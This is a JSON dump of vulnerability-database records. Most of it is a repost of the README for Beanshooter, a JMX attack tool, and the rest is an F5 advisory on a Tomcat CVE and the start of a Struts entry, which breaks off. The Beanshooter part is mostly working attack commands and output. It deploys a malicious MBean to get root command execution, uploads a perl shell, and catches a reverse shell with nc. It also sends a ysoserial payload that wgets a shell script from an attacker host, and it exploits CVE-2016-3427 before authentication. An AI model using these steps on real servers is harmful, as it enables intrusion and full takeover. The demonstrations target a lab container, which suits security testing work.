"accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2017-03-14T17:30:13", "id": "KITPLOIT:9079806502812490909", "href": "http://www.kitploit.com/2017/03/strutszeiro-telegram-bot-to-manage.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-12-03T16:47:58", "description": "[](<https://1.bp.blogspot.com/-0eeaBnOyz9k/YOhDZkX8dRI/AAAAAAAAjJE/yFbbfffyC10NDagL8yjxgF_lOr1H1A_pwCK4BGAYYCw/s1600/beanshooter_3_01-demo-737802.gif>)\n\n \n\n\n_ \n_\n\n_Beanshooter_ is a [command line](<https://www.kitploit.com/search/label/Command%20Line> \"command line\" ) tool written in _Java_, which helps to identify [common vulnerabilities](<https://www.kitploit.com/search/label/Common%20Vulnerabilities> \"common vulnerabilities\" ) on _JMX_ endpoints. \n\n\n \n\n\n**Introduction**\n\n_JMX_ stands for _Java Management Extensions_ and can be used to monitor and configure the _Java Virtual Machine_ from remote. Applications like _tomcat_ or _JBoss_ are often installed together with a _JMX_ instance, which enables server administrators to monitor and manage the corresponding application.\n\n_JMX_ uses so called _MBeans_ for monitoring and configuration tasks. The _JMX_ agent (sever, port) is basically just an interface, that handles remote connections and supports methods to communicate with the underlying _MBean_ objects. The actual functionality is then implemented in the _MBean_ itself and the _JMX_ agent only relays input and output to the _MBean_ object.\n\nBy default, _JMX_ endpoints support a _MBean_ with name _MLet_. This _MBean_ can be used to deploy new _MBeans_ on the _JMX_ agent. The codebase for these new _MBean_ objects can be obtained over the network e.g. in form of a _HTTP_ request. Using the **MLet** feature, attackers with access to a _JMX_ agent can easily deploy their own malicious _MBean_ objects and compromise the underlying application server.\n\n_Beanshooter_ is a _Proof-of-Concept_ tool, that can be used to identify vulnerable endpoints. It works for unauthenticated _JMX_ endpoints as well as for authenticated ones (assumed you have valid credentials and sufficient permissions). Furthermore, it can be used to test other [vulnerabilities](<https://www.kitploit.com/search/label/vulnerabilities> \"vulnerabilities\" ) like insecure _Java Deserialization_ or _CVE-2016-3427_. Also connections using the _JMXMP_ protocol are supported.\n\n \n**Installation** \n\n\n_Beanshooter_ is a _Maven_ project. This makes the installation a straight forward process and no manual installation of libraries should be required. First of all, make sure that you have _maven_ installed on your system:\n \n \n $ sudo apt install maven # Debian \n $ pacman -s maven # Arch\n\nThen, clone the _beanshooter_ project in a location of your choice and run `mvn package` inside of the projects folder.\n \n \n [qtc@kali opt]$ git clone https://github.com/qtc-de/beanshooter \n [qtc@kali opt]$ cd beanshooter \n [qtc@kali beanshooter]$ mvn package \n [INFO] Scanning for projects... \n [INFO] \n [INFO] -------------------< de.qtc.Beanshooter:beanshooter >------------------- \n [INFO] Building beanshooter 2.0.0 \n [INFO] --------------------------------[ jar ]--------------------------------- \n [...]\n\nSince the main purpose of _beanshooter_ is the deployment of _MBean_ objects, you need also a corresponding _MBean_. Theoretically you can deploy any _MBean_ that fulfills the _MBean specifications_. However, this project does also provide a reference implementation, the [tonka-bean](<https://github.com/qtc-de/beanshooter/blob/master/tonka-bean> \"tonka-bean\" ). The _tonka-bean_ is a separate _maven_ project and you can compile it in the same way as you compiled _beanshooter_:\n \n \n [qtc@kali beanshooter]$ cd tonka-bean/ \n [qtc@kali tonka-bean]$ mvn package \n [INFO] Scanning for projects... \n [INFO] \n [INFO] --------------------< de.qtc.TonkaBean:tonka-bean >--------------------- \n [INFO] Building tonka-bean 1.0.0 \n [INFO] --------------------------------[ jar ]--------------------------------- \n [INFO] \n [...]\n\nAfter _maven_ has finished, you should find the executable _.jar_ files in the target folders of the corresponding projects. Notice, that _beanshooter_ needs to know where the `tonka-bean.jar` file is located. If you have placed _beanshooter_ inside of your `/opt` folder, this should work automatically. Otherwise, you need to specify the path by using a configuration file or the corresponding command line options.\n \n \n [qtc@kali opt]$ ls -l beanshooter/target/beanshooter.jar \n -rw-r--r-- 1 qtc qtc 314856 Sep 16 07:55 beanshooter/target/beanshooter.jar \n [qtc@kali opt]$ ls -l beanshooter/tonka-bean/target/tonka-bean.jar \n -rw-r--r-- 1 qtc qtc 2624 Sep 16 07:57 beanshooter/tonka-bean/target/tonka-bean.jar\n\n_Beanshooter_ also supports autocompletion for _bash_. To take advantage of autocompletion, you need to have the [completion-helpers](<https://github.com/qtc-de/completion-helpers> \"completion-helpers\" ) project installed. If setup correctly, just copying the [completion script](<https://github.com/qtc-de/beanshooter/blob/master/resources/bash_completion.d/beanshooter> \"completion script\" ) to your `~/.bash_completion.d` folder enables autocompletion.\n \n \n [qtc@kali beanshooter]$ cp resources/bash_completion.d/beanshooter ~/bash_completion.d/\n\n \n**Usage** \n\n\nFor demonstration purposes, the project contains a [docker image](<https://github.com/qtc-de/beanshooter/packages/398561> \"docker image\" ) of an _Apache Tomcat_ with _JMX_ enabled and listening on port 9010. The corresponding [docker-files](<https://github.com/qtc-de/beanshooter/blob/master/.docker> \"docker-files\" ) can be found inside this repository and should enable you to practice the usage of _beanshooter_ yourself.\n\nThe listing below shows the _nmap_ output for the corresponding container.\n \n \n [qtc@kali]# nmap -p- -sV 172.17.0.2 \n Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-24 06:51 CEST \n Nmap scan report for 172.17.0.2 \n Host is up (0.0000050s latency). \n Not shown: 65524 closed ports \n PORT STATE SERVICE VERSION \n 5555/tcp open java-object JMXMP Connectors \n 5556/tcp open java-object Java Object Serialization \n 5557/tcp open java-object Java Object Serialization \n 5558/tcp open java-object Java Object Serialization \n 5559/tcp open java-object Java Object Serialization \n 5560/tcp open java-object Java Object Serialization \n 8009/tcp open ajp13 Apache Jserv (Protocol v1.3) \n 8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1 \n 9010/tcp open ssl/sdr? \n 9011/tcp open ssl/d-star? \n 40213/tcp open java-rmi Java RMI \n \n Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . \n Nmap done: 1 IP address (1 host up) scanned in 20.50 se conds\n\nThis output can be misleading, as _nmap_ is not able to detect the _rmiregistry_ right away. This is because the _rmiregistry_ on this server is configured for _TLS_ usage, which breaks most of the common detection and enumeration tools. However, by looking at the high port that was successfully flagged as _Java RMI_, once can guess that one of the _SSL_ ports has to be the _rmiregistry_. Using [remote-method-guesser](<https://github.com/qtc-de/remote-method-guesser> \"remote-method-guesser\" ) (one of the few tools that support _SSL_ protected registry servers), one can verify that a _JMX agent_ is running:\n \n \n [qtc@kali ~]$ rmg --ssl --classes 172.17.0.2 9010 \n [+] Connecting to RMI registry... done. \n [+] Obtaining a list of bound names... done. \n [+] 1 names are bound to the registry. \n [-] RMI object tries to connect to different remote host: iinsecure.dev \n [-] \tRedirecting the ssl connection back to 172.17.0.2... \n [-] \tThis is done for all further requests. This message is not shown again. \n [+] Listing bound names in registry: \n [+]\t\u00e2\u20ac\u00a2 jmxrmi \n [+]\t --> javax.management.remote.rmi.RMIServerImpl_Stub (known class)\n\nTo verify unauthenticated access, you can use _beanshooter_ with the _status_ action. On an unprotected _JMX endpoint_, the output should look like this:\n \n \n [qtc@kali ~]$ beanshooter --ssl 172.17.0.2 9010 status \n [+] Connecting to JMX server... \n [+] RMI object tries to connect to different remote host: iinsecure.dev \n [+] Redirecting the connection back to 172.17.0.2... done! \n [+] Creating MBeanServerConnection... done! \n [+] \n [+] Getting Status of MLet... done! \n [+]\tMLet is not registered on the JMX server. \n [+] Getting Status of malicious Bean... done! \n [+]\tmalicious Bean is not registered on the JMX server.\n\nThe status command shows that neither _MLet_ nor the malicious _MBean_ are registered on the _JMX_ endpoint. You could now either deploy them one by one by using the _deployMLet_ and _deployMBean_ actions, or you can simply use _deployAll_ to deploy both in one step. However, for deploying the malicious _MBean_ the remote server needs to establish a _HTTP_ connection to your listener. Therefore, you might need a firewall [whitelisting](<https://www.kitploit.com/search/label/Whitelisting> \"whitelisting\" ) and you have to use the corresponding `--stager-host` and `--stager-port` options of _beanshooter_ to specify where your listener can be found. Lastly, make sure that the _MBean_ you want to deploy can be found in the path that is specified in your configuration file (default is: `/opt/beanshooter/tonka-bean/target/`). If you use a custom _MBean_, you should also adopt the _beanClass_ and _objectName_ values.\n \n \n [qtc@kali ~]$ beanshooter --ssl --stager-host 172.17.0.1 --stager-port 8080 172.17.0.2 9010 deployAll \n [+] Connecting to JMX server... \n [+] RMI object tries to connect to different remote host: iinsecure.dev \n [+] Redirecting the connection back to 172.17.0.2... done! \n [+] Creating MBeanServerConnection... done! \n [+] \n [+] Creating MBean 'MLet' for remote deploymet... done! \n [+] \n [+] Malicious Bean seems not to be registered on the server \n [+] Starting registration process \n [+] \tCreating HTTP server on 172.17.0.1:8080 \n [+] \t\tCreating MLetHandler for endpoint /mlet... done! \n [+] \t\tCreating JarHandler for endpoint /tonka-bean.jar... done! \n [+]\t\tStarting the HTTP server... done! \n [+] \n [+] \tReceived request for /mlet \n [+] \tSending malicious mlet: \n [+] \n [+] \t\tClass:\t\tde.qtc.tonkabean.TonkaBean \n [+] \t\tArchive:\ttonka-bean.jar \n [+] \t\tObject:\t\tMLetTonkaBean:name=TonkaBean,id=1 \n [+] \t\tCodebase:\thttp://172.17.0.1:8 080 \n [+] \n [+] \tReceived request for /tonka-bean.jar \n [+] \tSending malicious jar file... done! \n [+] \n [+] malicious Bean was successfully registered\n\nNow one can use the _status_ or _ping_ command to verify that the malicious _MBean_ was successfully deployed:\n \n \n [qtc@kali ~]$ beanshooter --ssl 172.17.0.2 9010 status \n [+] Connecting to JMX server... \n [+] RMI object tries to connect to different remote host: iinsecure.dev \n [+] Redirecting the connection back to 172.17.0.2... done! \n [+] Creating MBeanServerConnection... done! \n [+] \n [+] Getting Status of MLet... done! \n [+]\tMLet is registered on the JMX server. \n [+] Getting Status of malicious Bean... done! \n [+]\tmalicious Bean is registered on the JMX server. \n [qtc@kali ~]$ beanshooter --ssl 172.17.0.2 9010 ping \n [+] Connecting to JMX server... \n [+] RMI object tries to connect to different remote host: iinsecure.dev \n [+] Redirecting the connection back to 172.17.0.2... done! \n [+] Creating MBeanServerConnection... done! \n [+] \n [+] Sending ping to the server... done! \n [+] Servers answer is: Pong!\n\nIf you deployed a custom malicious _MBean_, you can now invoke your _MBean_ methods directly from within _jconsole_. While this is also possible for the _tonka-bean_, _beanshooter_ supports actions to interact with the _tonka-bean_ from the command line:\n \n \n [qtc@kali ~]$ beanshooter --ssl 172.17.0.2 9010 execute id \n [+] Connecting to JMX server... \n [+] RMI object tries to connect to different remote host: iinsecure.dev \n [+] Redirecting the connection back to 172.17.0.2... done! \n [+] Creating MBeanServerConnection... done! \n [+] \n [+] Sending command 'id' to the server... \n [+] Servers answer is: uid=0(root) gid=0(root) groups=0(root)\n\nYou can also use the _shell_ action, to launch multiple commands as in a (pseudo) command shell. The shell also contains wrappers around the `upload`, `download` and `executeBackground` actions of _beanshooter_:\n \n \n [qtc@kali ~]$ beanshooter --ssl 172.17.0.2 9010 shell \n [+] Connecting to JMX server... \n [+] RMI object tries to connect to different remote host: iinsecure.dev \n [+] Redirecting the connection back to 172.17.0.2... done! \n [+] Creating MBeanServerConnection... done! \n [+] \n [+] Starting interactive shell... \n \n $ id \n uid=0(root) gid=0(root) groups=0(root) \n $ !upload ~/www/shell.pl /dev/shm/s.pl \n [+] File upload finished. 170 bytes were written to /dev/shm/s.pl \n $ !background perl /dev/shm/s.pl \n Command is executed in the background. \n $ exit \n \n [qtc@kali ~]$ nc -vlp 4444 \n Ncat: Version 7.80 ( https://nmap.org/ncat ) \n Ncat: Listening on :::4444 \n Ncat: Listening on 0.0.0.0:4444 \n Ncat: Connection from 172.17.0.2. \n Ncat: Connection from 172.17.0.2:37522. \n id \n uid=0(root) gid=0(root) groups=0(root)\n\nOnce you are done with your _MBean_, you should make sure to undeploy all changes that you have made to the server. At least you should remove your malicious _MBean_ from the server, but if _MLet_ was not available when you started, you should also remove the _MLet_. _beanshooter_ makes the cleanup pretty easy, by just invoking:\n \n \n [qtc@kali ~]$ beanshooter --ssl 172.17.0.2 9010 undeployAll \n [+] Connecting to JMX server... \n [+] RMI object tries to connect to different remote host: iinsecure.dev \n [+] Redirecting the connection back to 172.17.0.2... done! \n [+] Creating MBeanServerConnection... done! \n [+] \n [+] Unregister malicious bean... done! \n [+] Unregister MBean 'MLet'... done!\n\nNow the _JMX_ endpoint should be clean again and _MLet_ and the malicious _MBean_ should be removed.\n\n \n**JMXMP Support** \n\n\n_JMXMP_ (_JMX Messaging Protocol_) is just an alternate way (alternate connector) to access a _JMX_ agent and differs in some points from the _Java RMI_ based access as described above. However, for the purpose of this tool, these differences do not really matter. The important thing is that also the _JMXMP_ connector can allow unauthenticated connections and it is also possible to use the _MLet MBean_ over this connector.\n\nThe required classes for the _JMXMP_ connector can be found inside a _.jar_ file called _jmxremote_optional.jar_. Unfortunately, this _.jar_ does not has its own project on _Maven_ anymore (it seems like it was an artifact of the _JMX_ project once, but was removed for some reason). Now, it can be loaded as an artifact of other projects. _beanshooter_ supports the _JMXMP_ protocol by using the _jmxremote-optional_ artifact from _org.glassfish.external_.\n\nIn order to test _JMXMP_ support, the provided [docker-image](<https://github.com/qtc-de/beanshooter/packages/398561> \"docker-image\" ) also opens multiple _JMXMP_ listener on the ports `5555` to `5560`. The following listing shows just the same examples as above, but this time using the _JMXMP_ protocol:\n \n \n [qtc@kali ~]$ beanshooter --jmxmp --stager-host 172.17.0.1 --stager-port 8080 172.17.0.2 5555 deployAll \n [+] Connecting to JMX server... done! \n [+] Creating MBeanServerConnection... done! \n [+] \n [+] Creating MBean 'MLet' for remote deploymet... done! \n [+] MBean 'MLet' did already exist. \n [+] \n [+] Malicious Bean seems not to be registered on the server \n [+] Starting registration process \n [+] \tCreating HTTP server on 172.17.0.1:8080 \n [+] \t\tCreating MLetHandler for endpoint /mlet... done! \n [+] \t\tCreating JarHandler for endpoint /tonka-bean.jar... done! \n [+]\t\tStarting the HTTP server... done! \n [+] \n [+] \tReceived request for /mlet \n [+] \tSending malicious mlet: \n [+] \n [+] \t\tClass:\t\tde.qtc.tonkabean.TonkaBean \n [+] \t\tArchive:\ttonka-bean.jar \n [+] \t\tObject:\t\tMLetTonkaBean:name=TonkaBean,id=1 \n [+] \t\tCodebase:\thttp://172.17.0.1:8080 \n [+] \n [+] \tReceived request for /tonka-bean.jar \n [+] \tSending malicious jar file... d one! \n [+] \n [+] malicious Bean was successfully registered \n [qtc@kali ~]$ beanshooter --jmxmp 172.17.0.2 5555 execute id \n [+] Connecting to JMX server... done! \n [+] Creating MBeanServerConnection... done! \n [+] \n [+] Sending command 'id' to the server... \n [+] Servers answer is: uid=0(root) gid=0(root) groups=0(root)\n\nApart from the plain _JMXMP_ listener on port `5555`, the other _JMXMP_ listeners implement different kind of protections:\n\n * Port `5556` \\- _SSL_ protected _JMXMP_\n * Port `5557` \\- _TLS SASL/PLAIN_ protected _JMXMP_\n * Port `5558` \\- _TLS SASL/CRAM-MD5_ protected _JMXMP_\n * Port `5559` \\- _TLS SASL/DIGEST-MD5_ protected _JMXMP_\n * Port `5560` \\- _TLS SASL/NTLM_ protected _JMXMP_\n\n_Beanshooter_ supports all these types of protections and corresponding examples can be found inside the `README.md` of the [docker-container](<https://github.com/qtc-de/beanshooter/blob/master/.docker> \"docker-container\" ).\n\nUseful tip: It is also possible to use _jconsole_ to connect to a running _JMX_ agent via _JMXMP_. Instead of simply specifying the host and port number for the connection, you have to use the _JMXMP_ service URI `service:jmx:jmxmp://<JMXMPHOST>:<JMXMPPORT>` and you have to make sure that the _jmxremote_optional.jar_ is inside your classpath.\n\n \n**Deserialization Support** \n\n\n[](<https://github.com/qtc-de/beanshooter/blob/master/resources/media/02-deserialization-demo.gif> \"JMX enumeration and attacking tool. \\(16\\)\" )[](<https://4.bp.blogspot.com/-fVJ4LM15vXo/YOhDb-7uTlI/AAAAAAAAjJM/i8LpAZbEOloigXJYcQZBqQgMf8HVkhP-ACK4BGAYYCw/s1600/beanshooter_4_02-deserialization-demo-743568.gif>)\n\nIn case of authenticated _JMX_ endpoints, it is pretty common that usage of _MLet_ does not work, even with valid credentials. The following listing shows an attempt to deploy a malicious _MBean_ on an authenticated _JMX_ endpoint:\n \n \n [qtc@kali ~]$ beanshooter --ssl 172.18.0.2 9010 status \n [+] Connecting to JMX server... \n [+] RMI object tries to connect to different remote host: iinsecure.dev \n [+] Redirecting the connection back to 172.18.0.2... failed! \n [*] \n [-] The following exception was thrown: java.lang.SecurityException: Authentication failed! Credentials required \n [qtc@kali ~]$ beanshooter --ssl --username controlRole --password control 172.18.0.2 9010 status \n [+] Connecting to JMX server... \n [+] RMI object tries to connect to different remote host: iinsecure.dev \n [+] Redirecting the connection back to 172.18.0.2... done! \n [+] Creating MBeanServerConnection... done! \n [+] \n [+] Getting Status of MLet... done! \n [+]\tMLet is not registered on the JMX server. \n [+] Getting Status of malicious Bean... done! \n [+]\tmalicious Bean is not registered on the JMX server. \n [qtc@kali ~]$ beanshooter --ssl --username controlRole --password control 1 72.18.0.2 9010 deployAll \n [+] Connecting to JMX server... \n [+] RMI object tries to connect to different remote host: iinsecure.dev \n [+] Redirecting the connection back to 172.18.0.2... done! \n [+] Creating MBeanServerConnection... done! \n [+] \n [+] Creating MBean 'MLet' for remote deploymet... failed! \n [-] The following exception was thrown: java.lang.SecurityException: Access denied! Creating an MBean that is a ClassLoader is forbidden unless a security manager is installed.\n\nIn these cases it might still be possible to attack the _JMX_ endpoint by using _deserialization attacks_. To allow such attacks, the [ysoserial](<https://github.com/frohoff/ysoserial> \"ysoserial\" ) project can be integrated to _beanshooter_ by specifying the path to the corresponding _ysoserial .jar_ file. This can be configured either in the configuration file or by using the `--yso` command line option. The default location is `/opt/ysoserial/target/ysoserial-0.0.6-SNAPSHOT-all.jar`.\n\nWith _ysoserial_ setup correctly, one can attempt a [deserialization](<https://www.kitploit.com/search/label/Deserialization> \"deserialization\" ) attack against the target:\n \n \n [qtc@kali ~]$ beanshooter --ssl --username controlRole --password control 172.18.0.2 9010 ysoserial CommonsCollections6 \"wget -O /dev/shm/s.pl http://172.18.0.1:8000/shell.pl\" \n [+] Creating ysoserial payload...done. \n [+] Connecting to JMX server... \n [+] RMI object tries to connect to different remote host: iinsecure.dev \n [+] Redirecting the connection back to 172.18.0.2... done! \n [+] Creating MBeanServerConnection... done! \n [+] \n [+] Sending payload to 'getLoggerLevel'... \n [+] IllegalArgumentException. This is fine :) Payload probably worked. \n [qtc@kali ~]$ beanshooter --ssl --username controlRole --password control 172.18.0.2 9010 ysoserial CommonsCollections6 \"perl /dev/shm/s.pl\" \n [+] Creating ysoserial payload...done. \n [+] Connecting to JMX server... \n [+] RMI object tries to connect to different remote host: iinsecure.dev \n [+] Redirecting the connection back to 172.18.0.2... done! \n [+] Creating MBeanServerConn ection... done! \n [+] \n [+] Sending payload to 'getLoggerLevel'... \n [+] IllegalArgumentException. This is fine :) Payload probably worked. \n \n [qtc@kali ~]$ nc -vlp 4444 \n Ncat: Version 7.80 ( https://nmap.org/ncat ) \n Ncat: Listening on :::4444 \n Ncat: Listening on 0.0.0.0:4444 \n Ncat: Connection from 172.18.0.2. \n Ncat: Connection from 172.18.0.2:45994. \n id \n uid=0(root) gid=0(root) groups=0(root)\n\nOlder _JMX_ instances might also be vulnerable to _CVE-2016-3427_, which is basically a _pre-auth_ deserialization vulnerability. Whereas the above deserialization attack should work against the _RMI_ based connector as well as against _JMXMP_ based connector, the _pre-auth_ attack only works against the _RMI_ based connector:\n \n \n [qtc@kali ~]$ beanshooter --ssl 172.18.0.2 9010 cve-2016-3427 CommonsCollections6 \"perl /dev/shm/s.pl\" \n [+] Creating ysoserial payload...done. \n [+] cve-2016-3427 - Sending serialized Object as credential. \n [+] An exception during the connection attempt is expected. \n [+] Connecting to JMX server... \n [+] RMI object tries to connect to different remote host: iinsecure.dev \n [+] Redirecting the connection back to 172.18.0.2... failed! \n [*] \n [*] Caught SecurityException with content 'Authentication failed! Credentials should be String[] instead of java.util.HashSet'. \n [*] Target is most likely vulnerable to cve-2016-3427. \n \n [qtc@kali ~]$ nc -vlp 4444 \n Ncat: Version 7.80 ( https://nmap.org/ncat ) \n Ncat: Listening on :::4444 \n Ncat: Listening on 0.0.0.0:4444 \n Ncat: Connection from 172.18.0.2. \n Ncat: Connection from 172.18.0.2:46000. \n id \n uid=0(root) gid=0(root) groups=0(root)\n\n \n**Advanced Usage** \n\n\nAbove it was already mentioned that _beanshooter_ can read options from a configuration file. Options that would require long values, like the name of the _MBean_ class or the corresponding _ObjectName_ can only be passed inside of the configuration file. The following snipped shows you the default configuration file that is used by _beanshooter_ internally:\n \n \n defaultCmd=id \n stagerPort=8080 \n stagerHost=127.0.0.1 \n \n username= \n password= \n boundName=jmxrmi \n \n jarPath=/opt/beanshooter/tonka-bean/target/ \n jarName=tonka-bean.jar \n \n ysoserial=/opt/ysoserial/target/ysoserial-0.0.6-SNAPSHOT-all.jar \n \n mLetName=DefaultDomain:type=MLet \n beanClass=de.qtc.tonkabean.TonkaBean \n objectName=MLetTonkaBean:name=TonkaBean,id=1\n\nIt is possible to overwrite each option by specifying a custom configuration file using the `--config` parameter. The custom config file does not need to contain all options. Options that are not present were simply set to the default value. If you want your custom configuration to apply for each usage of _beanshooter_, you can also modify the [config.properties](<https://github.com/qtc-de/beanshooter/blob/master/src/config.properties> \"config.properties\" ) file inside of the [src](<https://github.com/qtc-de/beanshooter/blob/master/src> \"src\" ) folder before compiling the project.\n\nIn situations where the targeted server cannot access your host because of restrictive firewall rules, you may be able to use the `--remote-stager` option to specify a remote stager host. If you have access to the _remote-stager_, you can also use _beanshooter_ to deploy the _MBean_ by using the `--stager-only` option, which only spawns the _HTTP_ listener. When using this option, no additional command line parameters are required. However, on your attacking machine you still need to specify the correct `--stager-host`, either by using command line options or a configuration file.\n\n \n**Why beanshooter** \n\n\nHere are some of the advantages why you may choose _beanshooter_ in favor of other _JMX_ scanning solutions:\n\n * Full _SSL_ support for _JMX_ objects and the _rmiregistry_\n * Automatic redirection for objects bound to e.g. _localhost_\n * Full _JMXMP_ support with almost all available authentication options\n * _ysoserial_ integration to test for insecure deserialization\n * _CVE-2016-3427_ detection\n * Autocompletion for _bash_\n * Vulnerable docker container to run tests against\n \n**Credits** \n\n\n * The initial idea and also the initial codebase of the tool were taken from [this blogpost](<https://www.optiv.com/blog/exploiting-jmx-rmi> \"this blogpost\" ).\n * For the _JMXMP_ implementation, [this project](<https://github.com/felixoldenburg/jmxmp-lifecycle-listener> \"this project\" ) was really helpful.\n * Some functionalities were inspired by the [mjet project](<https://github.com/mogwailabs/mjet> \"mjet project\" )\n\nCopyright 2020, Tobias Neitzel and the _beanshooter_ contributors.\n\n \n \n\n\n**[Download Beanshooter](<https://github.com/qtc-de/beanshooter> \"Download Beanshooter\" )**\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.0, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-07-22T12:30:00", "type": "kitploit", "title": "Beanshooter - JMX Enumeration And Attacking Tool", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3427"], "modified": "2021-07-22T12:30:00", "id": "KITPLOIT:7314019160937441300", "href": "http://www.kitploit.com/2021/07/beanshooter-jmx-enumeration-and.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "f5": [{"lastseen": "2019-04-30T18:21:00", "description": "\nF5 Product Development has assigned ID 466436 (ARX) and INSTALLER-2832 (Traffix SDC) to this vulnerability.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Severity| Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM| None| 12.0.0 - 12.1.1 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP AAM| None| 12.0.0 - 12.1.1 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP AFM| None| 12.0.0 - 12.1.1 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP Analytics| None| 12.0.0 - 12.1.1 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP APM| None| 12.0.0 - 12.1.1 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP ASM| None| 12.0.0 - 12.1.1 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP DNS| None| 12.0.0 - 12.1.1| Not vulnerable| None \nBIG-IP Edge Gateway| None| 11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP GTM| None| 11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP Link Controller| None| 12.0.0 - 12.1.1 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP PEM| None| 12.0.0 - 12.1.1 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP PSM| None| 11.4.0 - 11.4.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP WebAccelerator| None| 11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP WebSafe| None| 12.0.0 - 12.1.1 \n11.6.0 - 11.6.1| Not vulnerable| None \nARX| 6.2.0 - 6.4.0| None| Medium| Apache Tomcat \nEnterprise Manager| None| 3.1.1| Not vulnerable| None \nBIG-IQ Cloud| None| 4.0.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Device| None| 4.2.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Security| None| 4.0.0 - 4.5.0| Not vulnerable| None \nBIG-IQ ADC| None| 4.5.0| Not vulnerable| None \nBIG-IQ Centralized Management| None| 5.0.0 - 5.1.0 \n4.6.0| Not vulnerable| None \nBIG-IQ Cloud and Orchestration| None| 1.0.0| Not vulnerable| None \nF5 iWorkflow| None| 2.0.0 - 2.0.2| Not vulnerable| None \nLineRate| None| 2.5.0 - 2.6.1| Not vulnerable| None \nTraffix SDC| 5.0.0 - 5.1.0 \n4.0.0 - 4.4.0| None| Medium| Apache Tomcat\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nMitigation\n\nTo mitigate this vulnerability, you can limit access to the ARX GUI and Traffix SDC Management Console to only use secure networks.\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2016-12-02T01:34:00", "type": "f5", "title": "Apache Tomcat vulnerability CVE-2016-8735", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3427", "CVE-2016-8735"], "modified": "2017-04-27T19:14:00", "id": "F5:K49820145", "href": "https://support.f5.com/csp/article/K49820145", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2023-06-24T12:56:14", "description": "The Jakarta Multipart parser in Apache Struts 2 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1 has incorrect exception handling and error-message generation during file-upload attempts, which allows remote attackers to execute arbitrary commands via a crafted Content-Type, Content-Disposition, or Content-Length HTTP header, as exploited in the wild in March 2017 with a Content-Type header containing a #cmd= string. ([CVE-2017-5638](<https://vulners.com/cve/CVE-2017-5638>))\n\nImpact\n\nThere is no impact; F5 products are not 